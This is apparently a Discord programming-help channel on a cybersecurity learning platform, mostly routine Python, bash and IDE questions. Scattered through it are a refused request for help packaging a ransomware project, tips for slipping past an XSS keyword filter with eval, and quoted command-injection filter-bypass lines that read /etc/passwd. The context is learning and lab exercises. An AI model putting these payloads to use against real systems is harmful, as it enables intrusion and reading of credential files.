Nope, nor going to

Anyone here know how to convert from py to exe. For my script i imported from cryptography.fernet. However, when i convert to exe using pyinstaller, it does not work not sure what is the issue

I am currently creating a ransomware for my school project

here is my code

Hah, no.

Don’t send malware here

!rule 10

Rule 10: Do not post viruses or malicious files without explicit permission from the administrative staff. We understand that this is a discord for learning, however, there are plenty of places online to get malware for forensic examination and reverse engineering. This includes in the advanced channels.

Nobody is helping you convert it to a .exe

If you do, you will be muted for 24 hours

Even if it is for school, you’re usually required to sign some kind of NDA or equivalent for this very reason

https://www.youtube.com/watch?v=omrY53kbVoA

might be interesting if they actually had a working compiler 😛

    global is_locked
    if is_locked:
        while is_locked:
            ```
how do I keep this loop going until the lock is set to false somewhere else without killing the cpu?

This is a spinlock

It will kill the CPU because it spins

you can sleep.wait() like 0.05 seconds or something as an easy hack

sorry

time.sleep() *

yes, but what other options do I have?
I currently have a script that takes a file and thread maps all lines into a function
I am trying to get the function inside the thread to run with a delay between them, to separate the load so I was thinking about something that would lock the function once it starts and release it once the heavy work is done

I think I said the other day that you'll need to learn about locks and inter process signalling

I did I have been trying for like 2 days but I can't seem to find what I want, threading.lock should work but I sometimes run the function elsewhere in the code recursively and that's what breaks everything

As James said, a spin lock is what you want. Inter process signalling is always tricky, as there's a lot the programmer has to manage to make it work.
I would advise you to read some articles on concurrency and parallel programming; many of them will be written for C and C++, higher level languages will have equivalents. You absolutely need to understand the low level implementations of semaphores, mutexes and what atomicity is for what you are attempting.

https://en.wikipedia.org/wiki/Spinlock#Alternatives tl;dr it's not going to work without burning CPU cycles.
Heartily agree about learning concurrency techniques like that, albeit probably not as low level as you'd recommend

https://docs.python.org/3/library/threading.html#threading.Lock.acquire This may interest you

I rewrote the whole code but now I am trying to get it to release the lock in case of a crash, some on stack overflow suggested the usage of with lock and to have the exit function release the lock but I have no idea how to implement it

class threadlock(threading.lock):
    def __init__(self):
        threading.lock.__init__(self)
        self.acquire() = acquire()
    def __enter__(self):
    def __exit__(self):
        self.release()

I haven't had to work with classes at all in python before and I have actively avoided them

Honestly python is the wrong choice for concurrency IMO

It's just that I already wrote over 600 lines in the main function 🥺

not getting it to work after I thought everything is already complete is just

https://en.wikipedia.org/wiki/Sunk_cost#Fallacy_effect

This hurt my soul

Everything is already working I just need to figure out how to set the release on exit

and the sunk cost fallacy

#[test]
    fn successful_decoding() {
        let hash_decoder = HashDecoder::new();
        let result = hash_decoder.crack("098f6bcd4621d373cade4e832627b4f6").unwrap();

        assert_eq!(result, "test");
    }

This is failing because it's comparing "test" with test, how can I get rid of the quotation marks?

yes

yes

ok

https://betterdatascience.com/python-310-vs-python-311/

https://github.com/1337Rin/Swag-PSO

I'm using one of #Hydra's scripts. It's all correct. It makes a request to yadda-yadda, takes arguments. It's all good.
It's complaining about my ip variable. I don't know why os.environ doesn't like IP's...

Doesn't acccept a url either

Does it need strings? Docs say it works with a string, if i'm not mistaken (really can't tell with myself anymore)

Oh, "environment variables"

you're not using os.environ correctly, you're setting ip equal to an environment variable named 10.10.138.64 which doesn't exist, see this

that's odd. It's from Hydra....

But that makes sense

in that case, he should fix that

thanks @tropic minnow

Gave +1 Rep to @tropic minnow

now i need to figure out how to call it with 'request'

or just strip it down but that's not fun

I don't want to just hard-code the ip in there. I want to figure this out.

got it, lol..

im stoked

apparently you can export bash variables and python will grab them... that's awesome

with ```py

os.environ.get('X') ```

127.0.0.1:26789: Traceback (most recent call last):
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\net\tcp.py", line 92, in write
    return self.o.sendall(v)
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\OpenSSL\SSL.py", line 1845, in sendall
    self._raise_ssl_error(self._ssl, result)
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\OpenSSL\SSL.py", line 1692, in _raise_ssl_error
    raise SysCallError(errno, errorcode.get(errno))
OpenSSL.SSL.SysCallError: (10054, 'WSAECONNRESET')

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\server.py", line 113, in handle
    root_layer()
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\modes\http_proxy.py", line 23, in __call__
    layer()
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\protocol\tls.py", line 285, in __call__
    layer()
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\protocol\http1.py", ```

    layer()
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\protocol\http.py", line 206, in __call__
    if not self._process_flow(flow):
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\protocol\http.py", line 288, in _process_flow
    return self.handle_upstream_connect(f)
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\protocol\http.py", line 254, in handle_upstream_connect
    return layer()
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\protocol\http.py", line 103, in __call__
    layer()
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\protocol\tls.py", line 285, in __call__
    layer()
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\protocol\http2.py", line 346, in __call__
    self._complete_handshake()
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\server\protocol\http2.py", line 132, in _complete_handshake
    self.client_conn.send(self.connections[self.client_conn].data_to_send())
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\connections.py", line 107, in send
    self.wfile.write(message)
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\seleniumwire\thirdparty\mitmproxy\net\tcp.py", line 98, in write
    raise exceptions.TcpDisconnect(str(e))
seleniumwire.thirdparty.mitmproxy.exceptions.TcpDisconnect: (10054, 'WSAECONNRESET')```
any idea why it is happening?

I am running multiple selenium threads, I tried having extreme time between them but I am still getting it

check to see exactly what that command does (hint it takes in an Environment variable name)

Yes

Break the task down and google each part

Ah, teach a man to fish

Hacking, programming, and in fact most/all of IT is research based.

No point in solving the problem for them, they'll learn more by solving it themselves

watching the google carbon talk. They keep on saying "dont use carbon if you can use rust, we love rust" like thats going to stop me

All I'm hearing is reasons to not use Carbon

As someone with 12 years IT experience, I completely agree... Just rare to see someone employ it when asked for advice, especially online lol

They never asked for advice, just if it was possible 😉

Touché

hey what is the best ide for python?

I use default because it’s what I’m used to but it’s all preference.

I use VScode for JavaScript because the plugins are useful and I’m not familiar with the language so auto fill is nice.

I’d probably play around with a few and see which one you prefer:)

I like old looking ide’s like the eclipse ide

Does anyone know ides that look like that

Like a simple one

Not notepad ++ or anything like that

PyCharm is the most noted one

I've used it for a while, but I prefer Notepad++ in the end

PyCharm feels a lot like Eclipse

The only reason I prefer N++ is because most of the stuff I program is pretty simple and is less than 100 lines or so, PyCharm over complicates it for me... but if you are programming more intense stuff I'd recommend it

Sublime text

PyCharm is horrible, I hate it so much

The IDE is clunky, it is a fatter version of VScode, it is over complicated for no reason and it feels like so overkill

PyCharm is a bit heavier than VSCodium; if lightweight is the goal, just use VIM. PyCharm does have a lot of features and requires a pretty solid understanding of python to really utilize to best effect.
I really like it for the venv management features and the step through debugging.
IMO setting up debugging is a bit more complicated in VSCodium than PyCharm, but still pretty trivial if you have any experience with IDEs at all.

If all you need is to edit quick files and don't require a full project management integration, PyCharm probably isn't what fits your use case best.
There are a lot of other python IDEs, and I think most linux distros have a 'standard' py IDE that gets included on a basic desktop install.

sublime 🙏

sublime is amazing... not sure how I forgot about it lol.... and yeah, that's basically what I was saying, I think PyCharm is useful if you have a very large project, but gets in the way if not

Let me introduce you to Emacs.

For work I swap between PyCharm and Notepad++ depending on the size of the project, on my own machine I use Atom.

VSCode, but I actually use nano for some reason

There's no "best" one, it's generally opinion based

What main features are you looking for?

I used to also hate pycharm but after sitting down and learning the features it gives I love it, its also why I program in IntellJ for rust due to how easy it makes my life

as Juun says the step through debugging is also so helpfull

same here, some friends love it, i HATE it

Sounds like a marmite advertisement

Some of you guys are way too passionate about disliking an IDE lol

In all honesty, the 'best' IDE is the one that makes your workflow and life easier. What that means is different for each project, and sometimes for each task on the same project.
The only way to really know what's best for the use case is to have tried a bunch, and keep a shortlist of what you think is reasonable.

Hi can someone help me with data serialization in python?

I use VIM very often, because a large part of my job is reviewing files on remote systems that don't have a desktop environment installed. That makes my life easier.
But VIM isn't what I use for everything, as developing my config scripts to pull down different packages on each box I touch is tedious

heck even cobol is still kicking

Hello!
I'm wondering if anyone have knowledge of exploits for .NET.

I am admin of a system and have full access to the server, this is however irrelevant to my question.

There's a search function on the webpage where if you type the characters "> it gives a 500 error, does anyone know if this can be used to gain access to the database or similar (I am admin for that too ofc) or is it just a dead end? (Even though I know it's never safe to get an error when searching) and if anyone knows a search-query I could test to see if it's vulnerable.

I have tried some of the most basic things and so far nothing's given me any results.

The backend is .net with a sql-database and angularjs (v1) as front-end.

syntax looks a bit friendlier than rust I guess

Hmm, I'll check what it says tomorrow, maybe it is actually something like that.

Thank you!

Oh those absolutely suck

Just ruins the fun, but it doesn't apply to JSON or file input as a fun fact

Gave +1 Rep to @onyx merlin

I've got XSS on an app that seemed to have that filter because it didn't seem to properly filter in some places. It allowed upper case but not lower case or vice versa

It blocked the word alert

is there any way I could make this save so it just keeps on adding to the dict without overwriting it

It blocked alert, allowed eval, allowed eval("ALERT()".toLowerCase()) etc

Not with a dict.

what do I need?

Don't use globals

And you'd want an array of employee objects, or to change the key you're using in the dict

dang it

I wanted

the dict to act as a database

so theres absolutely no way

I can do that

wait

cant I use append

it worked with arrays

I don't think you understand the datatype

You may wish to read the documentation again

Alright

I guess maybe making a file

would make it work?

@onyx merlin

There's a reason data structures and types are one of the first fundamentals taught in programming courses

yeah I misunderstood dict

my mistake

I created a Wordlist Generator in python. Does anyone want to take a look at it? Not a code review but just test the program and tell me what you think

https://github.com/affeltrucken/IntelligentPasswordGenerator Here you go. Just a heads up. If you say yes on all options, the wordlists can be quite long.

Gave +1 Rep to @spare swan

I have worked on it quite a lot though. Thanks :)

Gave +1 Rep to @vast parcel

first time ive seen case switches being used in python in the wild

TIL Python had those

It was an update in 3.10 IIRC

Yikes, switch cases

Are they bad?

Not something I would consider ever using in Python, not necessarily bad:)

I thought that since they were a new addition to python, they had some sort of benefit, but I do prefer other methods.

If they work the same as other programming languages, they 100% are benficial

I'm just oldschool

Nope, but globals are

What is this point of this function?

i think it's simpler/faster to for a human to parse than the old if elif chaining - should render the same way at execution time though

depends on the use

Generally something to avoid

To return a string... duh 😆

but.....why

they don't quite work the same way, it's more of a pattern matching mechanism than a straight up boolean check - but that's more of a high level view. I haven't seen any time comparisons yet, but I haven't really looked either.

https://tenor.com/view/my-goals-are-beyond-your-understanding-reverse-flash-eobard-thawne-the-flash-gif-16637212

Probably to satisfy a unit test that is poorly designed.

Nope, it's used

def write2(key, date):
    for w in [key, reverseString(key)]:
        for f in [returnString, reverseString]:
            if use_swedish:
                w = replaceChars(key, r_swedish)
            writeToList(w + f(date))
            writeToList(w + lastTwoChars(f(date)))
            writeToList(w + lastTwoChars(f(date)) * 2)

Looping over two functions, my guess it's to cast

But that can be done with String()

Yeah, I don't see the benefit then

@magic falcon What was that language that exports straight into a document that you told me about?

For .pdf making

LaTeX?

nono, it was an actual programming language

Similar syntax to Python

Markdown and asciidoc are my current favorites for quick and dirty docs that don't need to be attractive

Was that you or am I going insane

Sphinx?

That's a python documentation library. For documenting your code

Found it, #general message

Ah! Jinja is a template thing that gets in a lot of places

Yeah, I realise now 😆

Sphinx, Django, Ansible all use Jinja2 as a lib for templating

I'll take a look

Thanks

Ill change that then

Did anyone take the time and try out the program lol. As of now Ive only seen people giving me feedback about my code

I dont know what to do now lmao I find different opinions everywhere

Is globals not ok for color formatting?

Oh nvm thats constants

Did you try it out?

Oh okay. No worries

anyone else learning C right now?

That's really funny that it keeps track of that

that's odd, i've never seen that, what jdk version have you installed?

Genuinely don't remember, only the fact that it was from Oracle

can I ask something about oop

Im tryna code a basic airplane simulator with all oop rules implemented

and I have no clue how I can implement interface, abstraction, and inheritance at the same time

If this is coursework, it's probably cheating to be getting help like this.

That being said, the things you're describing aren't "rules" of oop, they are aspects of oop that are useful to make cleaner, more extensible projects. If you're using any kind of GUI, you are more than likely going to use all three of those OOP concepts.

And if you don't understand what something is, you have the entire internet and thousands of hours of tutorials and explanations to search for online

its not course work

Ooo what's this airplane sim?

im taking like a bootcamp right now

and I have to make this for practice

its not for marks

I have to make a airplane simulator and use: inheritance, polymorphism, abstraction,interface, encapsulation

it doesnt have to do anything its just a basic program to understand oop better

I think I have some ideas now, how to code the program but Im not sure about a couple of things

So it is homework

It's coursework for the bootcamp

its practice

I dont upload it anywhere

You're paying a lot of money for the bootcamp, you should get all the value you can and ask the instructor

ye ik, it was 9pm when I asked the question

so cant really get help at this hour

I managed to make it work

Look it's just that people are very helpful here, but when you're on a course or something like that you really should be reaching out to your instructor or tutor for help. This place is more to have a general programming discussion outside no involvement with academics whatsoever ❤️

I'm learning PHP to understand how back end works and how vulnerability happens
Is there any recommendations for me

There are a number of rooms on THM that explain in a lot of detail how some vulnerabilities are possible, or how some misconfigurations can lead to a other nasty things. Aside from THM I find that over the wire has some nice web based challenges that I definitely learned a lot from

Is Rust good for writing malware? Can Rust go as "low level" as C++ for example?

Gave +1 Rep to @onyx delta

Beside that, we keep the malware topic out of general chats please, once you unlock #exploit-and-mal-studies you can ask about it there.

how do I unlock that channel?

Also, what's the exact purpose you want to write malware on your own ?

idk how I am suppose to achieve this certificates

I want to hack pentagon

jk, I am learning new programming language

Bcs I am studying CySec and want to have one" malware" language for reverse engineering/writing it itself

I read that Rust is becoming popular in this field, and according to text that you sent its bad

Probably best to not make such jokes in here.
Alright, ye, then do your best to get 0xD and you probably good to go in the channel I mentioned

VDP right?

maindiv = document.querySelector("#d_app > div.product-page-box > div > div:nth-child(1) > section > div.hero-slider.product-page-image-slider-container > div.product-image-row > div.gallery-container.gallery-container--alone.gallery-container--medium.gallery-container--horizontal > div.gallery-container__image.item-upgrade--frame > div > span > img");

document.addEventListener ("keydown", function (zEvent) {
    if (zEvent.ctrlKey  &&  zEvent.altKey  &&  zEvent.key === "g") {
        url = maindiv.src;
        console.log(url);
        window.open(url, '_blank');
    }});

im not really sure why my code isnt working

its a chrome extension

and it just refuses to recognize my keybind

See the chrome commands documentation https://developer.chrome.com/docs/extensions/reference/commands/

Hi guys, I ended up making Arduino and SO posts to try and fix this issue I'm having. Any help is appreciated feel free to @ me. https://stackoverflow.com/questions/73200678/arduino-cloud-api-nodejs-unauthorized-401-error-with-oauth-token. https://forum.arduino.cc/t/iot-api-nodejs-token-auth-401-problem/1018311

Did you try using the example like shown here:
https://github.com/arduino/iot-client-js#authentication

Cus it looks a bit different in your code

I know in the stack overflow post you said you followed it but it looks different idk

Yeah that's the documentation I followed. My code is just altered a bit for NodeJS and I'm using catch blocks / slightly different libraries

var rp = require('request-promise');
const fetch = require('cross-fetch');

One difference

hmm maybe its different for node or something. Tbh I'm not sure because I know barely anything about programming to be honest with you

Been meaning to do cs50 for years now lol

Where’s the error occurring exactly?

Also option across_user_ids it's only for Arduino internal use.

If you just need to list your devices, GET /iot/v2/devices is enough

const response = await fetch(ArduinoUrl, options);
const response = await rp(options);
``` Another difference

So I am getting a 401 unauthorized for any of the endpoints for example v2/devices or v2/things when I tried fetching and or using their library. I tried multiple endpoints.

I have NOT tried a different endpoint for a standard fetch() though like you said so maybe i'll alter that code and try again

But according to the doc I shouldn't have to be making fetch calls. I should be able to use their API instance. It doesn't seem to be working.

Although I did some snooping and internally they are just making fetch() calls anyway through the API library

All the API does is make Fetch() calls for you and abstract it. Which is odd that no matter how I am doing this I get a 401

    devicesV2ListWithHttpInfo(opts) {
      opts = opts || {};
      let postBody = null;

      let pathParams = {
      };
      let queryParams = {
        'across_user_ids': opts['acrossUserIds'],
        'serial': opts['serial'],
        'tags': this.apiClient.buildCollectionParam(opts['tags'], 'multi')
      };
      let headerParams = {
      };
      let formParams = {
      };

      let authNames = ['oauth2'];
      let contentTypes = [];
      let accepts = ['application/json'];
      let returnType = [ArduinoDevicev2];
      return this.apiClient.callApi(
        '/v2/devices', 'GET',
        pathParams, queryParams, headerParams, formParams, postBody,
        authNames, contentTypes, accepts, returnType, null
      );
    }

``` From their github

I appreciate it anyway

@true pumice OMG you're a HERO. I still have no idea why the API isn't working but doing my own fetch request with the URL you suggested worked ! ```js
[Symbol(Response internals)]: {
url: 'https://api2.arduino.cc/iot/v2/devices',
status: 200,
statusText: 'OK',
headers: Headers { [Symbol(map)]: [Object: null prototype] },
counter: 0
}

You’re welcome:)

Clutttch

anyone can explain to me what does this code do

$xrequest=[system.net.ftpwebrequest]::Create("ftp://ns.starsavenue.sg/wilson567.pfx")

Makes a request to download a file from an FTP server....?

Hence the ftpwebrequest and file URL ftp.../wilson567.pfx

ohh

$_|fl * -Force
then what does this mean. I am assuming it is to force the download?

You got it

At least, that is my interpretation of the code

?roles

ah ok thank you so much

Im having trouble with this python script

Is there anyway

I can make it so if you call any of these keys in the paramater

it will use the value like

print(test.headers)

so if you wrote

python3 test.py -P cookies

it would display cookies

the cookies of a website

print(test.cookies)

import sys

test_input = sys.argv[0]

print(“You typed: “ + test_input”)

Otherwise, using a parameter handler is probably better so that you can get flag short hand and long

https://docs.python.org/3/library/argparse.html @lilac holly

Click is very good for this kind of thing

brooo

thank you

so much

Sys module might of not been for this

I wrote this

import requests
import sys
import pyperclip as copyOutput

# Note if you want to save your output to a file the output has already been saved to your clipboard
# So you can just paste it in your file
while True:

    print("say --help if you want to see list of options next time you run the program")

    helpmenu = '''

-P to request for a paramater

Paramaters:

-P headers
-P cookies
-P status_code
-P url
-P history


Currently at this moment these are your only options due this is still in its early stages



    '''

    if sys.argv[1] == "--help":
        print(helpmenu)
        break

    if sys.argv[2] != "-P":
        print("Invalid Paramater")
        break


    contents = ''
    ParamaterContents = ''
    paramaterList = ['cookies', 'history', 'status_code', 'url', 'cookies']


    def requestWebsite(websiteLink, header):
        global contents
        global paramaterList
        contents = requests.get(websiteLink)
        print(contents.text)
        copyOutput.copy(contents.text)
        for availableParamaters in paramaterList:
            if str(header) not in paramaterList:
                print("Non existing Paramater")
                break
            print(contents.header)
    

        
    
        


    #try:
        requestWebsite(sys.argv[1], sys.argv[3])
    break
    #except:
        #print("Error with paramaters given")
    

I just started using the sys.argv

today

so I was messing around with it

but I cant seem to

get it right

its trash

It’s not trash.

You’re misusing it

how?

I was talking about my code btw

not

sys

Honestly just use something like https://pypi.org/project/click/

It will save you from a lot of pain in the future

argparse is also a great lib to use to build a CLI

It's not bad for standard python

Hey I was wondering if someone might be able to help me out?
I am trying to install macOS using only my keyboard, everything is going fine until the screen to choose which drive to install

are you trying to install the macOS software in a VM or on mac approved hardware?

In a VM

Is it a different process?

Is that VM hosted on a mac?

Yep

I can select almost every option using either alt+tab or spacebar except for the drive selection screen

Ok, then it should work and you shouldn't be in violation of ToS. I believe apple has documentation on it

Yeah I have tried but unfortunately none of the options have worked

Is there potentially a way to install the OS just using command line?

Not a mac person, no idea

Ah ok, well thank you anyways

Check out point 7 and 8 here: https://www.techrepublic.com/article/how-to-use-macos-with-only-a-keyboard/

Yeah I already tried that unfortunately no luck

Plan B: Buy a mouse 😄

Lol unfortunately I need this vm to work without a mouse for the time being

Is there any other key combinations I can try?

Is it not possible to just use a mouse temporarily?

Maybe I can just install macOS through the command line?

Is that a possibility?

I don't have one on hand at the moment and I need this vm up and running ideally by end of day today or maximum tomorrow morning

It also makes no sense why I can go through all the other menus perfectly fine with a keyboard but when it comes to selecting the drive there seems to be no possible keyboard command for that

Hmm, never installed a mac before so no idea sadly - sorry

You'll have to figure out the keyboard map in the virtualization application you're using, as it will differ from the macOS keyboard mapping. Especially for fn, Control, Option, Command keys.

You think it could be due to the keyboard being mapped differently by the vm application?

No worries, I have little knowledge installing a mac as well

Yes, for example Command + C (copy) is Control + C in virtualization software like VirtualBox.

Ah I see, I will take a look and see if there is something in the documentation that might help, didn't think to consider that it might be an issue with the vm application

Thank you for your help!
Hopefully I'll be able to figure it out

Good luck!

Thank you!

Last option to try is Mouse Keys. It can be enabled in System Preferences. Works like a Virtual Mouse. 😄

Is it possible to enable it in the installer menus? Because that would be awesome

Try it out. 💪

someone please save me

join vc LOL

im getting this error and have no idea what to do

Address: 0 Expected Value: 280c Received Value: 3fff

googled it and it seems pretty situational

need a master

Any tips to get better with powershell.

Just completed hacking with powershell room.

And I feel like it is not enough

?

Manage a system using powershell

or even, manage mutiple systems with powershell

Hello ,
So I am currently learning bash scripting and I got a question .

So I have a txt file and one example of line is :

insite:top secret inurl:do,Google,valley.com,https://valley.com/things-to-do,Things to D

I want to extract the domain that is valley.com .

The logic formed can be a string which is after second "," but before third "," .
But I am not sure How should I add to a variable .
Can anyone help ?

I tried to google but maybe I am not entering the right keywords to get the correct direction.
Any keywords that might land me in the correct direction is also welcome .

P.s: I am not doing anything unethical or illegal 😅
And this is not a homework .
Trying out to code myself .

Thank you

Got it . Thank you .

Gave +1 Rep to @vast parcel

Hey guys quick question. So I want to implement super simple rate-limiting to my cloud function via IP key store to prevent API abuse. Now, I know there is a Redis-Googlecloud-Serverless option but uhhhh it costs money. So far i've spent a grand total of $0 for my API and cloud functions and i'd like to keep it that way. Is there any other keystore databases that would work well with the cloud functions? Or if I just implement it in my code inside my cloud function via a npm package would it still work? Idk a bit lost on this looking for advice thanks.

can anyone guide in regarding API programming i have quick questions to ask

https://dontasktoask.com/

I don't know much about this but I do know that cloudflare does content delivery and protects against ddos abuse

You don't need to splash out for some fancy keystore database.
You can implement it in memory with leaky bucket algorithms (or find someone who's implemented that for you already, after all this is npm)

anyone know why this isnt working

heres the output

I pinged infront.com

as a test

heres the output

then says this

yeah but it's cloud functions so in mem doesn't work i believe

If there's no state then you'll struggle yeah

'seq 1 254' is treated as string not as a command, you should remove quotes and add $(seq 1 254)

And i am not really sure why are you concatenating sequential number with an IP.

Hi guys, i need help with a project I’m doing, it consists of adding a button to chromium that executes specific code, someone can help me?

https://tenor.com/view/sad-sorry-im-sorry-stitch-apologetic-gif-12304217

So, I’ve to add a button i chromium that execute a code I’ve previously written. I downloaded the source code but I don’t know where to start 😅

hello everyone ! i thinks most of you are maybe developer and i was asking myself
how i can become a better developer ? and how i can progress
like i would want to put something on my github and have other dev showing me my error but for exemple i don't know at all what to put on it iiii don't thinks my creation are usefull for the world or they are just for private project

sooo i don't know what would i suggest me ? :) thanks

first thing first your project is your project, it doesn't mean that it need to be useful for everyone's sake

u are doing it for the improvement

Compared to last time you asked, this is missing way too much information.
My point about learning how webapps track sessions still stands

Hey everyone! I was wondering if someone might be able to help me out? I am trying to write a bash script that will execute a command after a certain duration after another command has started to be executed, how would I go about doing this?

use sleep

So something like:
1st command || sleep 30s && 2nd command?

yes

but sleep function doesn't look like that

search on google

I understand but in terms of formatting this would work?

yep

Alright awesome, thank you!

Gave +1 Rep to @solemn beacon

Where did you get the file?

-ban @azure raft -ddays 1 Vigilante activity. Trying to evade HWID detection on a file.

🔨 Banned Xy#8442 indefinitely

Okay so I have pretty much given up on using google cloud functions because trying to add functionality while keeping it free is becoming a massive challenge. It seems like the easier option for a small side project would be to upload my nodeJS to Heroku, and then intergate a database and memstore that way. I think using cloudfare for CDN stuff also seems easier this way and as far as I can tell is 100% free you don't even need to enter your credit card. Thoughts, opinions?

Hello everyone, I want to learn back-end development to be good in web pentesting, What should I learn for example (PHP and ASP.net or one is enough) (do I need MVC) ?

There is no working compiler or toolchain

How can you learn it if there isn't a working compiler for it

hello everyone, i was searching about programming languages that were needed in cybersecurity, and i found out that C/C++ is one of the most required ones, what do you recommend to learn it? like any website or smt, thx for any help

You don't need to know how to program for cyber security, it can help you for sure but isn't essential. If you want some decent languages to learn, many start with a C derived language and something like python/ruby but it's not essential.

I'd definitely invest some time at some point but once you learn a few styles of languages and understand how to navigate documentation, you can program in other languages of similar styles using experience and documentation to help

For getting started books and websites can be useful. I started with books and found them useful but SoloLearn was really good and CodeAcademy was pretty good also 🙂

@bronze plover ^ (forgot to click reply haha)

ill go to uni and python is the first language ill learn, but i wanted to start to learn some other stuff, so that i could get some extra knowledge

thx for the websites 🙂

Gave +1 Rep to @vale cairn

Yeah, fair enough 🙂 The main times programming will probably come in use is if you want to write a tool to automate a process, examine the code behind an exploit you're using or eventually to develop a proof of concept exploit AFAIK

There may be some other uses but they're the main ones I can think of that pertain to cyber security

what would u recommend to start learning?

i did actually thought u used a fair bit of programming there

i started to a learn a bit how to virtualize and got kali linux installed, wanted to learn some tools there but...its so much that it gets hard to understand smt in special

and dont know what is actually usefull or not

It's worth learning but it's not worth focussing your entire learning on if you're wanting to go into cyber security because with a bit of google etc. you'll probably be able to find out how to do whatever you're trying to accomplish

if you're looking to get started in cyber sec and are not sure where to start I'd recommend checking out #start-here , that being said it's definitely worth learning the basics of a scripting language such as python 🙂

thx

u have been really helpfull

thx

nw gl 🙂

one last thing if u could help me, i wanted to learn more about the paths inside cybersecurity, i know that there are many paths and i dont really know which are the ones i love and want to follow, could u explain a bit and/or help-me how to learn more about it

somewhere in the starter path there's a room that introduces you to the different jobs involved with cyber security and there's a little quiz you can do that helps you determine the sort of thing you might be interested in. From there you'll want to work towards whatever path interests you (but first I'd get a strong foundation doing things such as the starting paths like presec etc.)

thx 🙂

How can I make two different web pages detected as focused without any extensions? can someone explain the concept itself because I tried googling and I couldn't get it

Should you be uploading a toml file to github? or anyother cloudfare files I should include in a gitignore

Depends on contents.

Well I'm not really sure about the TOML cause It has my cloudfare ID in it

But in the tutorials it seems like they have one

Oh wait they removed their ID in the file lol

is there anything sensitive in the .toml? anything that uniquely identifies your cloudflare instance? Or is that cloudflare ID more like a public key?

I think its a private key so yeah maybe I shouldn't upload that lol.

well...

Maybe not then

Unless you're making a fun CTF 😄

I wouldn't put real creds in a ctf

No lets not

I think that boils down to event listeners, but I'm struggling with the motives for doing this.

It isn't really related to THM but I just hate ads, and some ad-blocked content only counts wait timers if focused and I was curious on how it works

I see what you mean, although not a fan of ads somebody gotta pay them bills! Most likely event listeners, you may be surprised how much is exposed online!

I already do watch the ads, but with multiple tabs open it gets out of hand really quickly, I tried researching ever since and found that my dns was leaking and a few other things, great experience honestly

https://pynative.com/python-prettyprint-json-data

I definitely have the right Syntax

@surreal bronze

when I used the indent==4

Show me your whole code

indent=4

oh the code?

yes

I can't help debug it much without the code itself

Replace that with print(json.dumps(nmapOutput, indent=4))

ok

alr its loading

I don't know how that would fix the problem tho

if this doesn't work

ill use

pprint.pprint(nmapOutput, indent=4)

yeah its the same thing

@surreal bronze

Where are you running it from?

kali linux

No like, are you running it from the terminal?

yeah

output the results to a file

do something like

Ill put it in a variable and write

the data to a file

like that?

with open("test.json", "w+") as f:
     f.write(json.dumps(nmapOutput, indent=4))

ah ok

that would work too

ill do that

The point of the program though is to show

where you run it

not

in a file

Yeah I just wanna see if that changes anything

ah ok

ill do that

pprint

seems to be doing it pretty well

do you want me to check

with the json file too?

or no?

Sure yeah

I've just got home from holidays and really tired so probably missing something here, indent=4 has always worked for me so not sure, I will take a look tommorw if this doesn't work

oh also I fixed it

turns out there is multiple

json python modules

and simple-json was the one I was supposed to use

now its new

neat

another script tripping on its ass

no way this works

like how

what

do you mean

how

answered in #general . To repeat my answer here, functions are a first-order object in python.

Tl;dr as to what this means: you can pass them as variables which is how the threading works there

Does anyone help me with this, how to read or open such file to debug or find the root cause of this error. Is there any specific command can help? I tried with cat and file so far, is there any better approach to debug such files
/hangs$ ls id:000000,src:000247,op:fs-havoc-generate,rep:4 

This doesn't sound like programming

Hey humans und Neuzeitmagier
Can somebody please help me ?
I used linux since years but I never saw this „<<<„ in my live

Can someone „translate“ the following code for me and replace the „|“ with „<<<„?

find /usr/share/ | grep root | grep mysql | tail -n 1

@true pumice

|| wait until you realise this defines are backwards, so this ain't gonna work ||

Hello
Can anyone tell me what does payload packaging means?
I was following nightmare on github and there author was using a p32 function from pwntools python to and was passing it a hex value
what is use of that function?
I couldn't understand its use from its docs

Gave +1 Rep to @onyx merlin

?

@lilac holly I need this code in one line with „<<<„ instead of „|“

Oh

I will search and I find anything I will tell you

No you shouldn’t search for it 😂
I just need one Human which „translates“ me this

I need to answer a question for a Command Injection
The pipe „|“ is filtered so I need to use „<<<„

Bruh

swissky@crashlab:~$ echo ${HOME:0:1}
/
Command Injection Bypass characters filter

swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root❌0:0:root:/root:/bin/bash

swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/

swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/

Link: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command Injection/README.md

In principle, it is the same as the

It's very simple in itself. My problem is that I have never seen the command "<<<" and I have to replace the pipes with the "<<<" because the normal pipes in the php are filtered.
Of course, you can't just replace the pipes, but you have to rewrite the code.

Thank you very much !

Gave +1 Rep to @vast parcel

One question
What does this „Robocop“ ?

Oh my god, I need it

